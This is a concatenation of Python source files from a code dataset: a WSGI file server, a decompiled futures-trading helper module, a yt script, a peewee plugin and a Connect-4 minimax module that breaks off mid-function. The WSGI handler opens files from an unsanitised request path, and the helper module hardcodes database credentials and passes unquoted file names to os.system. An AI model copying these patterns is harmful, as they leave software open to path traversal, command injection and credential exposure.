= './resources'\n\n# A relatively simple WSGI application. It's going to print out the\n# environment dictionary after being updated by setup_testing_defaults\ndef simple_app(environ, start_response):\n if environ['PATH_INFO'] == '/file':\n environ['PATH_INFO'] = '/file.txt'\n elif environ['PATH_INFO'] == '/image':\n environ['PATH_INFO'] = '/image.jpg'\n \n if '.' in environ['PATH_INFO'] and '.html' not in environ['PATH_INFO']:\n # request for something other than html page\n ret = handle_resources(environ)\n else:\n # html request\n ret = handle_html(environ)\n\n return ret(environ, start_response)\n\n# return a 404 response\ndef error404():\n jEnv = jinja2.Environment(loader=jinja2.FileSystemLoader(JinjaTemplateDir))\n tmp = jEnv.get_template('notFound.html').render()\n ret = Response(tmp, mimetype ='text/html')\n ret.status = '404 Not Found'\n return ret\n \n# Handle all html page request\ndef handle_html(environ):\n jEnv = jinja2.Environment(loader=jinja2.FileSystemLoader(JinjaTemplateDir))\n\n path = environ['PATH_INFO']\n if path == '/':\n path = '/index'\n if not '.' in path:\n path += '.html'\n\n reqFS = cgi.FieldStorage(fp = environ['wsgi.input'],environ=environ)\n\n try:\n tmp = jEnv.get_template(path).render(reqFS)\n ret = Response(tmp, mimetype ='text/html')\n except jinja2.exceptions.TemplateNotFound:\n return error404()\n\n if path == '/badRequest.html':\n ret.status = '400 Bad Request'\n\n return ret\n\n# Handle resources (.txt, .jpg, .ico,...) request\ndef handle_resources(environ):\n fileDir = ResDir + environ['PATH_INFO']\n try:\n fp = open(fileDir, 'rb')\n except IOError:\n # File not found\n return error404()\n\n data = fp.read()\n fp.close()\n return Response(data, mimetype = guess_type(fileDir)[0])\n\ndef make_app():\n return simple_app\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"351908430","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: ..\\indicatorModule\\pyalgotrade\\commonHelpBylw.py\n# Compiled at: 2020-04-04 05:11:32\n# Size of source mod 2**32: 33271 bytes\n\"\"\"\nCreated on Wed Apr 4 16:12:37 2018\n\n@author: SH\n\"\"\"\nimport pandas as pd, sys\nsys.path.append('E://sihuanlw4SVN//framework')\nimport logging, re, numpy as np\nfrom pyalgotrade import calendayBylw\nFUTURES_CN_Day_STARTTIME_N001 = '21:00:00'\nFUTURES_CN_Day_STARTTIME_N002 = '09:00:00'\nFUTURES_CN_Day_ENDTIME = '15:00:00'\nFUTURES_CN_SYMNAME_MAP_SYMID = {'沪深主连':'CFFEX.IF', \n '上证主连':'CFFEX.IH', \n '中证主连':'CFFEX.IC', \n '债五主连':'CFFEX.TF', \n '债十主连':'CFFEX.T', \n '债二主连':'CFFEX.TS', \n '沪铜主连':'SHFE.CU', \n '沪金主连':'SHFE.AU', \n '沪银主连':'SHFE.AG', \n '沪锌主连':'SHFE.ZN', \n '沪铝主连':'SHFE.AL', \n '橡胶主连':'SHFE.RU', \n '螺纹主连':'SHFE.RB', \n '燃油主连':'SHFE.FU', \n '热卷主连':'SHFE.HC', \n '沥青主连':'SHFE.BU', \n '沪铅主连':'SHFE.PB', \n '沪镍主连':'SHFE.NI', \n '沪锡主连':'SHFE.SN', \n '线材主连':'SHFE.WR', \n '原油主连':'INE.SC', \n '豆一主连':'DCE.A', \n '豆二主连':'DCE.B', \n '玉米主连':'DCE.C', \n '淀粉主连':'DCE.CS', \n '纤板主连':'DCE.FB', \n '铁矿主连':'DCE.I', \n '焦炭主连':'DCE.J', \n '鸡蛋主连':'DCE.JD', \n '焦煤主连':'DCE.JM', \n '塑料主连':'DCE.L', \n '豆粕主连':'DCE.M', \n '棕榈主连':'DCE.P', \n 'PP主连':'DCE.PP', \n 'PVC主连':'DCE.V', \n '豆油主连':'DCE.Y', \n '棉花主连':'CZCE.CF', \n '棉纱主连':'CZCE.CY', \n '白糖主连':'CZCE.SR', \n 'PTA主连':'CZCE.TA', \n '菜油主连':'CZCE.OI', \n '甲醇主连':'CZCE.MA', \n '玻璃主连':'CZCE.FG', \n '菜粕主连':'CZCE.RM', \n '郑煤主连':'CZCE.ZC', \n '粳稻主连':'CZCE.JR', \n '晚稻主连':'CZCE.LR', \n '硅铁主连':'CZCE.SF', \n '锰硅主连':'CZCE.SM', \n '苹果主连':'CZCE.AP', \n '铁矿':'DCE.I', \n '苹果':'CZCE.AP', \n '甲醇':'CZCE.MA', \n '螺纹':'SHFE.RB', \n '镍':'SHFE.NI', \n '白糖':'CZCE.SR', \n 'PTA':'CZCE.TA', \n '棉花':'CZCE.CF', \n '橡胶':'SHFE.RU', \n '豆油':'DCE.Y', \n '燃料油':'SHFE.FU', \n '原油':'INE.SC', \n 'PP':'DCE.PP', \n 'EG':'DCE.EG', \n '焦炭':'DCE.J', \n '白银':'SHFE.AG', \n '纸浆':'SHFE.SP', \n '沥青':'SHFE.BU', \n '鸡蛋':'DCE.JD', \n '豆粕':'DCE.M', \n '玉米':'DCE.C', \n '动力煤':'CZCE.ZC', \n '锰硅':'CZCE.SM'}\nSTOCKS_CN_SYMNAME_MAP_SYMID = {'300ETF':'SHSE.510300', \n '500ETF':'SHSE.510500', \n '标普500':'SHSE.513500', \n '纳指ETF':'SHSE.513100', \n '创业板50':'SZSE.159949'}\n\ndef splitASymbol(aSymbol):\n atemp = aSymbol.split('.')\n exchange = atemp[0]\n secID = atemp[1]\n secSymbol = ''\n secYear = ''\n secMonth = ''\n secDict = {}\n if exchange == 'CZCE' or exchange == 'SHFE':\n secSymbol = secID[0:2]\n secMonth = secID[-2:]\n elif exchange == 'DCE':\n if secID[0:2] in ('jm', 'jd', 'cs', 'pp'):\n secSymbol = secID[0:2]\n secMonth = secID[-2:]\n elif secID[0:1] in ('a', 'c', 'i', 'j', 'l', 'm', 'p', 'v', 'y'):\n secSymbol = secID[0:1]\n secMonth = secID[-2:]\n else:\n if exchange == 'CFFEX':\n if secID[0:2] in ('IC', 'IH', 'IF', 'TF'):\n secSymbol = secID[0:2]\n secMonth = secID[-2:]\n elif secID[0:1] in ('T', ):\n secSymbol = secID[0:1]\n secMonth = secID[-2:]\n secYear = secID.replace(secSymbol, '').replace(secMonth, '')\n secDict['secSymbol'] = exchange + '.' + secSymbol\n secDict['secYear'] = secYear\n secDict['secMonth'] = secMonth\n import datetime\n strtime = datetime.datetime.now().strftime('%Y-%m-%d')\n if exchange == 'CZCE':\n strNext1Year = str(int(strtime[0:4]) + 1)\n strNext2Year = str(int(strtime[0:4]) + 2)\n if strtime[3] == secYear:\n secDict['secRealYear'] = strtime[2] + secYear\n if strNext1Year[3] == secYear:\n secDict['secRealYear'] = strNext1Year[2] + secYear\n if strNext2Year[3] == secYear:\n secDict['secRealYear'] = strNext2Year[2] + secYear\n else:\n secDict['secRealYear'] = secYear\n return secDict\n\n\ndef juejinSymbol(x):\n if x[0] in ('5', '6'):\n return 'SHSE.' + x\n else:\n return 'SZSE.' + x\n\n\ndef adjustSymbol(aSym):\n if '.' in aSym:\n splitSym = aSym.split('.')\n if 'DCE' in aSym or 'SHFE' in aSym:\n adjustSym = splitSym[0] + '.' + splitSym[1].lower()\n return adjustSym\n if 'CZCE' in aSym or 'CFFEX' in aSym:\n adjustSym = splitSym[0] + '.' + splitSym[1].upper()\n return adjustSym\n if 'SHF' in aSym:\n adjustSym = splitSym[0] + 'E.' + splitSym[1].lower()\n return adjustSym\n if 'CZC' in aSym:\n adjustSym = splitSym[0] + 'E.' + splitSym[1].upper()\n return adjustSym\n\n\ndef reverseExchangeAndSecID(aSymbol):\n splitSym = aSymbol.split('.')\n return splitSym[1] + '.' + splitSym[0]\n\n\ndef adjustExchangeName(oldName):\n if oldName == '郑商所':\n return 'CZCE'\n else:\n if oldName == '大商所':\n return 'DCE'\n else:\n if oldName == '上期所':\n return 'SHFE'\n if oldName == '中金所':\n return 'CFFEX'\n if oldName == '能源中心':\n return 'INE'\n assert 2 == 1, 'strage exchangeName'\n\n\ndef symNameToSymID(symName):\n adict = {}\n adict.update(FUTURES_CN_SYMNAME_MAP_SYMID)\n adict.update(STOCKS_CN_SYMNAME_MAP_SYMID)\n return adict[symName]\n\n\ndef addExchange(aSymbol):\n instruments4CZCE = [\n 'TA', 'SR', 'CF', 'OI', 'MA',\n 'FG', 'RM', 'ZC', 'SF', 'SM', 'AP',\n 'ER', 'RO', 'WS', 'ME', 'WH',\n 'TC', 'WT', 'PM', 'RI', 'LR',\n 'JR', 'CY', 'RS', 'GN']\n instruments4DCE = [\n 'A', 'B', 'C', 'CS', 'I', 'J',\n 'JD', 'JM', 'L', 'M', 'P',\n 'PP', 'V', 'Y', 'FB', 'S',\n 'EG']\n instruments4SHFE = [\n 'AL', 'BU', 'CU', 'SN', 'ZN',\n 'HC', 'NI', 'PB', 'RB', 'RU',\n 'AG', 'AU', 'FU', 'WR']\n instruments4INE = [\n 'SC']\n instruments4CFFEX = [\n 'IC', 'IH', 'IF', 'T', 'TF']\n adjustSym = aSymbol.upper()\n fianSymbol = ''\n if adjustSym[0:2] in instruments4CZCE:\n if len(adjustSym[2:]) == 4:\n fianSymbol = 'CZCE.' + aSymbol[0:2].upper() + adjustSym[3:]\n else:\n fianSymbol = 'CZCE.' + aSymbol.upper()\n else:\n if adjustSym[0:2] in instruments4SHFE:\n fianSymbol = 'SHFE.' + aSymbol.lower()\n else:\n if adjustSym[0:2] in instruments4INE:\n fianSymbol = 'INE.' + aSymbol.lower()\n else:\n if adjustSym[0:2] in instruments4CFFEX:\n fianSymbol = 'CFFEX.' + aSymbol.upper()\n else:\n if adjustSym[0:1] in instruments4CFFEX:\n fianSymbol = 'CFFEX.' + aSymbol.upper()\n else:\n if adjustSym[0:2] in instruments4DCE:\n fianSymbol = 'DCE.' + aSymbol.lower()\n else:\n if adjustSym[0:1] in instruments4DCE:\n fianSymbol = 'DCE.' + aSymbol.lower()\n return fianSymbol\n\n\ndef removeExchange(aSymbol):\n adjSymbol = aSymbol.split('.')\n return adjSymbol[1]\n\n\ndef getOptionContractsBylw(sDateTime, eDateTime):\n engine = create_engine('mysql+pymysql://admin:admin@192.168.10.81:3306/option?charset=utf8', encoding='utf-8')\n optionSymbolsINfo = pd.read_sql('SELECT * FROM optionContractBasicInfo', engine)\n if sDateTime:\n if eDateTime:\n optionSymbolsINfo = optionSymbolsINfo[(~((optionSymbolsINfo['listed_date'] > eDateTime) | (optionSymbolsINfo['expire_date'] < sDateTime)))]\n return list(optionSymbolsINfo['wind_code'].values)\n\n\ndef contracts4wangzong():\n instruments4CZCE = [\n 'CZCE.TA', 'CZCE.SR', 'CZCE.CF', 'CZCE.OI', 'CZCE.MA',\n 'CZCE.FG', 'CZCE.RM', 'CZCE.ZC', 'CZCE.SF', 'CZCE.SM', 'CZCE.AP']\n instruments4DCE = [\n 'DCE.A', 'DCE.B', 'DCE.C', 'DCE.CS', 'DCE.I', 'DCE.J',\n 'DCE.JD', 'DCE.JM', 'DCE.L', 'DCE.M', 'DCE.P',\n 'DCE.PP', 'DCE.V', 'DCE.Y']\n instruments4SHFE = [\n 'SHFE.AL', 'SHFE.BU', 'SHFE.CU', 'SHFE.SN', 'SHFE.ZN',\n 'SHFE.HC', 'SHFE.NI', 'SHFE.PB', 'SHFE.RB', 'SHFE.RU', 'SHFE.AG', 'SHFE.AU']\n instruments4INE = [\n 'INE.SC']\n instruments4CFFEX = [\n 'CFFEX.IC', 'CFFEX.IH', 'CFFEX.IF', 'CFFEX.T', 'CFFEX.TF']\n return instruments4CZCE + instruments4DCE + instruments4SHFE + instruments4INE + instruments4CFFEX\n\n\ndef getFullSymbolName(astrList):\n resuList = []\n cList = contracts4wangzong()\n for acStr in astrList:\n for aSy in cList:\n if acStr in aSy:\n resuList.append(aSy)\n break\n\n return resuList\n\n\ndef getMainContinContract(aSymbol):\n if aSymbol == np.nan:\n return np.nan\n else:\n noDigit = re.sub('\\\\d+', '', aSymbol)\n return noDigit.upper()\n\n\ndef runAQQ(who, msg):\n import win32gui, win32con, win32clipboard as w\n\n def getText():\n w.OpenClipboard()\n d = w.GetClipboardData(win32con.CF_UNICODETEXT)\n w.CloseClipboard()\n return d\n\n def setText(aString):\n w.OpenClipboard()\n w.EmptyClipboard()\n w.SetClipboardData(win32con.CF_UNICODETEXT, aString)\n w.CloseClipboard()\n\n to_who1 = who\n content = '机器人信息:' + msg\n setText(content)\n qqhd = win32gui.FindWindow(None, to_who1)\n print(qqhd)\n win32gui.SendMessage(qqhd, 258, 22, 2080193)\n win32gui.SendMessage(qqhd, 770, 0, 0)\n win32gui.SendMessage(qqhd, win32con.WM_KEYDOWN, win32con.VK_RETURN, 0)\n win32gui.SendMessage(qqhd, win32con.WM_KEYUP, win32con.VK_RETURN, 0)\n\n\ndef btStartEndDates():\n import time, datetime\n currDateTime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n currDate = currDateTime[0:10]\n aSTimeStr = '08:00:00'\n aeTimeStr = '16:00:00'\n m1dt = datetime.datetime.strptime(currDate, '%Y-%m-%d') + DateOffset(years=(-1), months=(-3))\n m1dtStr = m1dt.strftime('%Y-%m-%d')\n m2dt = datetime.datetime.strptime(currDate, '%Y-%m-%d') + DateOffset(days=(-2))\n m2dtStr = m2dt.strftime('%Y-%m-%d')\n nextYearofToday = datetime.datetime.strptime(currDate, '%Y-%m-%d') + DateOffset(years=1)\n nextYearofTodayStr = nextYearofToday.strftime('%Y-%m-%d')\n aTradingDays = get_trading_dates(exchange='SHSE', start_date='2000-01-01', end_date=nextYearofTodayStr)\n aNewTradeCalendar = calendayBylw.customTradeCalendar(aTradingDays)\n backTestsDateT = aNewTradeCalendar.mDatesOffset(m1dtStr, yoffset=0) + ' ' + aSTimeStr\n backTesteDateT = aNewTradeCalendar.mDatesOffset(m2dtStr, yoffset=0) + ' ' + aeTimeStr\n maxLen = 60\n barsNum = 3\n\n\ndef updateMFE(aOrderMFEdict, basicBar_):\n if not aOrderMFEdict is not None:\n raise AssertionError\n else:\n assert basicBar_ is not None\n posi = aOrderMFEdict['orderPosition']\n if posi.barsSinceEntry > 0:\n if posi.barsSinceEntry == 1:\n aOrderMFEdict['HH'] = basicBar_.getHigh()\n aOrderMFEdict['LL'] = basicBar_.getLow()\n else:\n aOrderMFEdict['HH'] = max(aOrderMFEdict['HH'], basicBar_.getHigh())\n aOrderMFEdict['LL'] = min(aOrderMFEdict['LL'], basicBar_.getLow())\n if posi.positionSide == 'long':\n aOrderMFEdict['MFE'] = aOrderMFEdict['HH'] - posi.cost\n if posi.positionSide == 'short':\n aOrderMFEdict['MFE'] = posi.cost - aOrderMFEdict['LL']\n\n\ndef copyFiles2(sourceDir, targetDir, filename=None):\n import os, shutil\n if sourceDir.find('exceptionfolder') > 0:\n return\n else:\n if filename:\n sourceFile = os.path.join(sourceDir, filename)\n targetFile = os.path.join(targetDir, filename)\n if os.path.isfile(sourceFile):\n if not os.path.exists(targetDir):\n os.makedirs(targetDir)\n if not os.path.exists(targetFile) or os.path.exists(targetFile) and os.path.getsize(targetFile) != os.path.getsize(sourceFile):\n open(targetFile, 'wb').write(open(sourceFile, 'rb').read())\n print(targetFile + ' copy succeeded')\n if os.path.isdir(sourceFile):\n copyFiles(sourceFile, targetFile)\n else:\n for file in os.listdir(sourceDir):\n sourceFile = os.path.join(sourceDir, file)\n targetFile = os.path.join(targetDir, file)\n if os.path.isfile(sourceFile):\n if not os.path.exists(targetDir):\n os.makedirs(targetDir)\n if not os.path.exists(targetFile) or os.path.exists(targetFile) and os.path.getsize(targetFile) != os.path.getsize(sourceFile):\n open(targetFile, 'wb').write(open(sourceFile, 'rb').read())\n print(targetFile + ' copy succeeded')\n if os.path.isdir(sourceFile):\n copyFiles(sourceFile, targetFile)\n\n\ndef cusCopyFile(sourceDir, targetDir, filename=None):\n import os, shutil\n ss = os.path.dirname(sourceDir)\n abDir = os.path.abspath(sourceDir)\n if filename:\n sourceFile = os.path.join(abDir, filename)\n os.system('copy %s %s' % (sourceFile, targetDir))\n else:\n for file in os.listdir(sourceDir):\n abDirFile = os.path.join(abDir, file)\n if os.path.isfile(abDirFile):\n os.system('copy %s %s' % (abDirFile, targetDir))\n\n\ndef writeLog2console(logInstance='aLogger', msg=None):\n import logging\n loggerCons = logging.getLogger(logInstance)\n formatter = logging.Formatter('%(asctime)s %(levelname)-8s: %(message)s')\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.formatter = formatter\n loggerCons.addHandler(console_handler)\n loggerCons.setLevel(logging.INFO)\n loggerCons.info(msg)\n\n\ndef writeLog2File(logInstance='aLogger', logfile=None, msg=None):\n import logging\n logger = logging.getLogger(logInstance)\n formatter = logging.Formatter('%(asctime)s %(levelname)-8s: %(message)s')\n file_handler = logging.FileHandler(logfile, mode='w')\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n logger.setLevel(logging.INFO)\n logger.info(msg)\n\n\ndef splitDates(sDateTime, eDateTime, step_=3000, moreDataFlag=False):\n from gm.api import get_trading_dates\n import time, datetime\n from pandas.tseries.offsets import DateOffset\n currDateTime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n currDate = currDateTime[0:10]\n nextYearofToday = datetime.datetime.strptime(currDate, '%Y-%m-%d') + DateOffset(years=1)\n nextYearofTodayStr = nextYearofToday.strftime('%Y-%m-%d')\n aTradingDays = get_trading_dates(exchange='SHSE', start_date='2000-01-01', end_date=nextYearofTodayStr)\n aNewTradeCalendar = calendayBylw.customTradeCalendar(aTradingDays)\n sDate = sDateTime[0:10]\n eDate = eDateTime[0:10]\n if moreDataFlag:\n ssDate = aNewTradeCalendar.mDatesOffset(sDate, doffset=(-1), leftOrright=(-1))\n eeDate = aNewTradeCalendar.mDatesOffset(eDate, doffset=1, leftOrright=1)\n else:\n ssDate = aNewTradeCalendar.mDatesOffset(sDate, doffset=0, leftOrright=1)\n eeDate = aNewTradeCalendar.mDatesOffset(eDate, doffset=0, leftOrright=(-1))\n atradeDateSerial = aNewTradeCalendar.getADateTimeSeries(ssDate, eeDate)\n datesList = []\n sIndex = 0\n eIndex = sIndex + step_ - 1\n while 1:\n cSdate = atradeDateSerial.iloc[sIndex]\n if eIndex >= atradeDateSerial.shape[0]:\n cEdate = atradeDateSerial.iloc[(-1)]\n else:\n cEdate = atradeDateSerial.iloc[eIndex]\n datesList.append((cSdate, cEdate))\n if eIndex >= atradeDateSerial.shape[0]:\n break\n else:\n sIndex = sIndex + step_\n eIndex = eIndex + step_\n\n atuple = datesList[0]\n datesList[0] = (atuple[0] + sDateTime[10:], atuple[1])\n atuple = datesList[(-1)]\n datesList[-1] = (atuple[0], atuple[1] + eDateTime[10:])\n return datesList\n\n\ndef dtToUnixTimeStamp(adt):\n ats = int(adt.timestamp() * 1000)\n return ats\n\n\ndef round_up(value, y):\n import math\n ss = math.pow(10, y)\n vs = round(value * ss) / float(ss)\n return vs\n\n\ndef isCrossDay(symbol, lastDT, currDT):\n lastDate = lastDT[0:10]\n currDate = currDT[0:10]\n lastTime = lastDT[11:]\n nowTime = currDT[11:]\n if lastDate == currDate:\n if lastTime <= FUTURES_CN_Day_ENDTIME:\n if nowTime >= FUTURES_CN_Day_STARTTIME_N001:\n return True\n if lastDate < currDate:\n if lastTime <= FUTURES_CN_Day_ENDTIME:\n if nowTime >= FUTURES_CN_Day_STARTTIME_N002:\n return True\n return False\n\n\ndef readLastLine(filename, encoding='gbk'):\n with open(filename, 'rb') as (hisRecordFile):\n import os\n first = hisRecordFile.readline()\n nextbyte = hisRecordFile.read(1)\n if nextbyte == b'':\n last = first\n else:\n hisRecordFile.seek(-2, os.SEEK_END)\n while nextbyte != b'\\n':\n hisRecordFile.seek(-2, os.SEEK_CUR)\n nextbyte = hisRecordFile.read(1)\n\n last = hisRecordFile.readline()\n lastStr = last.decode(encoding)\n return lastStr.strip('\\r\\n')\n\n\ndef rangeLeftAndRight(avalue, step, stepCount):\n aList = []\n for i in range(1, stepCount + 1):\n aList.append(avalue - i * step)\n aList.append(avalue + i * step)\n\n aList.append(avalue)\n return sorted(aList)\n\n\nimport os\n\ndef mkdir(path):\n path = path.strip()\n path = path.rstrip('\\\\')\n isExists = os.path.exists(path)\n if not isExists:\n os.makedirs(path)","sub_path":"pycfiles/quantlwsdk-0.0.12-py3-none-any/commonHelpBylw.cpython-36.py","file_name":"commonHelpBylw.cpython-36.py","file_ext":"py","file_size_in_byte":18136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"386454586","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# displayNumberType.py - displayNumberType\n\n# Date : 2019/12/10\n\ndef displayNumberType(num):\n print(str(num) + ' is ', end='')\n if isinstance(num, (int, float, complex)):\n print('a number of type:', type(num).__name__)\n else:\n print('not a number at all!')\n\n\ndisplayNumberType(-69)\ndisplayNumberType(9999999999999999999)\ndisplayNumberType(98.6)\ndisplayNumberType(-5.2+1.9j)\ndisplayNumberType('xxx')\n","sub_path":"my/python-core/displayNumberType.py","file_name":"displayNumberType.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"280150369","text":"import yt\nimport numpy as np\nfrom yt import derived_field\n\n\n#@derived_field(name=\"emissivity\", units = \"g**2*K**0.5/cm**6\")\ndef run_stuff():\n # different data - FLASH\n filename = '~/data/GasSloshing/sloshing_nomag2_hdf5_plt_cnt_0100'\n sphere_rad = 15.0 # in kpc\n #Enzo\n filename = '~/data/IsolatedGalaxy/galaxy0030/galaxy0030'\n sphere_rad = 200.0 # in kpc\n outfile = 'galsurfaces'\n rho = 1e-27 # for each surface\n trans = 1.0 # for transparency of each surface\n color_field = 'temperature' # color your surface by this\n pf = yt.load(filename)\n # emissivity of the material\n # this needs to be a combination of the color_field and surface field\n #def _Emissivity(field, data):\n # return (eval(\"data['gas','density']*data['density']*np.sqrt(data['gas','temperature'])\"))\n def _Emissivity(field, data):\n return (data['gas','density']*data['density']*np.sqrt(data['gas','temperature']))\n #yt.add_field((\"gas\",\"emissivity\"), units=\"g**2*K**0.5/cm**6\", function=_Emissivity)\n yt.add_field(\"emissivity\", units=\"g**2*K**0.5/cm**6\", function=_Emissivity, force_override=True)\n # for testing\n #yt.SlicePlot(pf, 'z', \"emissivity\", width = (200.0, 'kpc')).save('~/Desktop/mytest.png')\n dd = pf.sphere(\"max\", (sphere_rad, \"kpc\"))\n surf = pf.surface(dd, 'density', rho)\n #surf.export_obj(outfile, transparency = trans, \n # color_field=color_field, emit_field = 'emissivity')\n emit_field_name = ('gas','emissivity')\n emit_field_max = None\n emit_field_min = None\n color_field_max = None\n color_field_min = None\n color_map = \"algae\"\n vertices, colors, alpha, emisses, colorindex = surf.export_blender(transparency = trans, \n color_field = color_field, emit_field = emit_field_name, color_map = color_map, \n plot_index = 0, \n color_field_max = color_field_max, color_field_min = color_field_min, \n emit_field_max = emit_field_max, emit_field_min = emit_field_min)\n return vertices\n\nv = run_stuff()\n","sub_path":"yt_files/createobj_emiss_clean.py","file_name":"createobj_emiss_clean.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"522327656","text":"\"\"\"This module gives a service of registration to server\"\"\"\n\nfrom peewee import SqliteDatabase, Model, CharField\nfrom core.common.plugin import AbstractPlugin\n\n\nDB = SqliteDatabase(None, threadlocals=True)\n\n\nclass Collector(Model):\n \"\"\"This model represents an instance of information collector\"\"\"\n id_collector = CharField()\n\n class Meta:\n database = DB\n\n\nclass DataAccess(AbstractPlugin):\n \"\"\"This model gives a initial configuration for database\"\"\"\n\n def __init__(self, database_url):\n DB.init(database_url)\n Collector.create_table(fail_silently=True)\n\n\nclass Hook(DataAccess):\n \"\"\"This class sets some fields for send header request\"\"\"\n\n def __init__(self, container, database_url):\n super(Hook, self).__init__(\n database_url=database_url)\n self._container = container\n\n def process(self):\n try:\n id_collector = Collector.get().id_collector\n except Collector.DoesNotExist:\n id_collector = 0\n\n return {'Id-Collector': str(id_collector),\n 'MB': self._container.parameters['id']}\n\n\nclass Registration(DataAccess):\n \"\"\"This class manages the collector register\"\"\"\n\n def register(self, id_collector):\n \"\"\"This method regists a nev collector\"\"\"\n Collector.delete().execute()\n Collector.create(\n id_collector=str(id_collector)).save()\n","sub_path":"plugins/registration/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"509531581","text":"\"\"\"Generic utility functions\n\"\"\"\n# from __future__ import print_function\nfrom random import shuffle\nfrom threading import Thread\nfrom queue import Queue\nimport time\nimport copy\n\nfrom connect_4.consts import BOARD_ROWS, BOARD_COLS, OPPONENT_COLOR\n\nINFINITY_TIME = float(6000)\nINFINITY = float('inf')\n\n\nclass ExceededTimeError(RuntimeError):\n \"\"\"Thrown when the given function exceeded its runtime.\n \"\"\"\n pass\n\n\ndef function_wrapper(func, args, kwargs, result_queue):\n \"\"\"Runs the given function and measures its runtime.\n\n :param func: The function to run.\n :param args: The function arguments as tuple.\n :param kwargs: The function kwargs as dict.\n :param result_queue: The inter-process queue to communicate with the parent.\n :return: A tuple: The function return value, and its runtime.\n \"\"\"\n start = time.process_time()\n try:\n result = func(*args, **kwargs)\n except MemoryError as e:\n result_queue.put(e)\n return\n\n runtime = time.process_time() - start\n result_queue.put((result, runtime))\n\n\ndef run_with_limited_time(func, args, kwargs, time_limit):\n \"\"\"Runs a function with time limit\n\n :param func: The function to run.\n :param args: The functions args, given as tuple.\n :param kwargs: The functions keywords, given as dict.\n :param time_limit: The time limit in seconds (can be float).\n :return: A tuple: The function's return value unchanged, and the running time for the function.\n :raises PlayerExceededTimeError: If player exceeded its given time.\n \"\"\"\n q = Queue()\n t = Thread(target=function_wrapper, args=(func, args, kwargs, q))\n t.start()\n\n # This is just for limiting the runtime of the other thread, so we stop eventually.\n # It doesn't really measure the runtime.\n t.join(time_limit)\n\n if t.is_alive():\n raise ExceededTimeError\n\n q_get = q.get()\n if isinstance(q_get, MemoryError):\n raise q_get\n return q_get\n\n\ndef count_sequence(board, player, length):\n \"\"\" Given the board state , the current player and the length of Sequence you want to count\n Return the count of Sequences that have the give length\n \"\"\"\n\n def vertical_seq(row, col):\n \"\"\"Return 1 if it found a vertical sequence with the required length\n \"\"\"\n count = 0\n for rowIndex in range(row, BOARD_ROWS):\n if board[rowIndex][col] == board[row][col]:\n count += 1\n else:\n break\n if count >= length:\n if row >= 1 and row+length < BOARD_ROWS:\n if board[row-1][col] == 0 and board[row+length][col] == 0:\n return 3\n elif board[row-1][col] == 0 or board[row+length][col] == 0:\n return 2\n else:\n return 1\n return 1\n else:\n return 0\n\n def horizontalSeq(row, col):\n \"\"\"Return 1 if it found a horizontal sequence with the required length\n \"\"\"\n count = 0\n for colIndex in range(col, BOARD_COLS):\n if board[row][colIndex] == board[row][col]:\n count += 1\n else:\n break\n if count >= length:\n if col >= 1 and col + length < BOARD_ROWS:\n if board[row][col-1] == 0 and board[row][col+length] == 0:\n return 3\n elif board[row][col-1] == 0 or board[row][col+length] == 0:\n return 2\n else:\n return 1\n return 1\n else:\n return 0\n\n def negDiagonalSeq(row, col):\n \"\"\"Return 1 if it found a negative diagonal sequence with the required length\n \"\"\"\n count = 0\n col_index = col\n for rowIndex in range(row, -1, -1):\n if col_index > BOARD_ROWS:\n break\n elif board[rowIndex][col_index] == board[row][col]:\n count += 1\n else:\n break\n col_index += 1 # increment column when row is incremented\n if count >= length:\n return 1\n else:\n return 0\n\n def posDiagonalSeq(row, col):\n \"\"\"Return 1 if it found a positive diagonal sequence with the required length\n \"\"\"\n count = 0\n colIndex = col\n for rowIndex in range(row, BOARD_ROWS):\n if colIndex > BOARD_ROWS:\n break\n elif board[rowIndex][colIndex] == board[row][col]:\n count += 1\n else:\n break\n colIndex += 1 # increment column when row incremented\n if count >= length:\n return 1\n else:\n return 0\n\n totalCount = 0\n # for each piece in the board...\n for row in range(BOARD_ROWS):\n for col in range(BOARD_COLS):\n # ...that is of the player we're looking for...\n if board[row][col] == player:\n # check if a vertical streak starts at (row, col)\n totalCount += vertical_seq(row, col)\n # check if a horizontal four-in-a-row starts at (row, col)\n totalCount += horizontalSeq(row, col)\n # check if a diagonal (both +ve and -ve slopes) four-in-a-row starts at (row, col)\n totalCount += (posDiagonalSeq(row, col) + negDiagonalSeq(row, col))\n # return the sum of sequences of length 'length'\n return totalCount\n\n\nclass MiniMaxWithAlphaBetaPruning:\n def __init__(self, utility, my_color, no_more_time):\n \"\"\"Initialize a MiniMax algorithms with alpha-beta pruning.\n\n :param utility: The utility function. Should have state as parameter.\n :param my_color: The color of the player who runs this MiniMax search.\n :param no_more_time: A function that returns true if there is no more time to run this search, or false if\n there is still time left.\n :param selective_deepening: A functions that gets the current state, and\n returns True when the algorithm should continue the search\n for the minimax value recursivly from this state.\n \"\"\"\n self.utility = utility\n self.my_color = my_color\n self.no_more_time = no_more_time\n\n\n def search(self, game_state, depth, alpha, beta, maximizing_player):\n \"\"\"Start the MiniMax algorithm.\n\n :param state: The state to start from.\n :param depth: The maximum allowed depth for the algorithm.\n :param alpha: The alpha of the alpha-beta pruning.\n :param alpha: The beta of the alpha-beta pruning.\n :param maximizing_player: Whether this is a max node (True) or a min node (False).\n :return: A tuple: (The alpha-beta algorithm value, The move in case of max node or None in min mode)\n \"\"\"\n if self.no_more_time() or depth <= 0:\n return self.utility(game_state), None\n\n next_moves = game_state.get_possible_moves()\n if not next_moves:\n # This player has no moves. So the 